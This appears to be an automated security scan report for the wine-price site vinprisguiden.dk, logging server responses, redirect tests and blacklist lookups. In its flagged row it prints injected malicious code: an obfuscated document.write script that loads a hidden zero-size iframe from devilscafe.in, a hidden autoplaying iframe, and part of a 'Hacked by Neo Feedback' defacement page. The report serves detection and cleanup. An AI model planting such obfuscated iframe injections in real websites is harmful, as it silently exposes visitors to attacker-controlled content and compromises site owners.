Scanned pages/files
Request | Server response | Status |
http://vinprisguiden.dk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 27 Sep 2015 11:58:39 GMT Location: http://www.vinprisguiden.dk/ Server: Apache Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vinprisguiden.dk/ | 200 OK Content-Length: 5640 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%3Ciframe%20frameborder%3D%220%22%20height%3D%220%22%20src%3D%22http%3A//www.devilscafe.in%22%20%0A%0Awidth%3D%220%22%3E%3C/iframe%3E%0A%3Ca%20href%3D%22http%3A//www.devilscafe.in%22%20target%3D%22_blank%22%3E%3Cimg%20%0A%0Asrc%3D%22%22%20/%3E%22%29%29%3B%0A//--%3E%0A%3C/script%3E")); Antivirus reports:
Hidden iFrame found. size: 0x0 src: http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1 <iframe width="0" height="0" src="http://www.youtube.com/embed/40dt4cey0hy?&autoplay=1&rel=0&fs=0&start=7&showinfo=0&controls=0&autohide=1" frameborder="0" allowfullscreen> Deface/Content modification. The following signature was found: Hacked by Neo Feedback <html> <head> <title>Hacked by Neo Feedback</title> <link rel="icon" href="https://aronno1920.files.wordpress.com/2015/07/neofeedback.png" type="image/x-icon"> <script language="JavaScript">var brzinakucanja=200;var pauzapor=2000;var vremeid=null;var kretanje=false;var poruka=new Array();var slporuka=0;var bezporuke=0;poruka[0]="Hacked by Neo Feedback" poruka[1]="Hacked by N30 F33D64CK" function prikaz(){var text=poruka[slporuka];if(bezp ...[5711 bytes skipped]... | ||
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/javascript | clean |
http://vinprisguiden.dk/typed.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 27 Sep 2015 11:58:40 GMT Location: http://www.vinprisguiden.dk/typed.js Server: Apache Vary: Accept-Encoding Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.vinprisguiden.dk/typed.js | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
http://www.vinprisguiden.dk/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vinprisguiden.dk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 27 Sep 2015 11:58:39 GMT
Location: http://www.vinprisguiden.dk/
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
GET / HTTP/1.1
Host: vinprisguiden.dk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 27 Sep 2015 11:58:39 GMT
Location: http://www.vinprisguiden.dk/
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vinprisguiden.dk
Referer: http://www.google.com/search?q=vinprisguiden.dk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vinprisguiden.dk
Referer: http://www.google.com/search?q=vinprisguiden.dk
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vinprisguiden.dk
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://vinprisguiden.dk/
Result: vinprisguiden.dk is not infected or malware details are not published yet.
Result: vinprisguiden.dk is not infected or malware details are not published yet.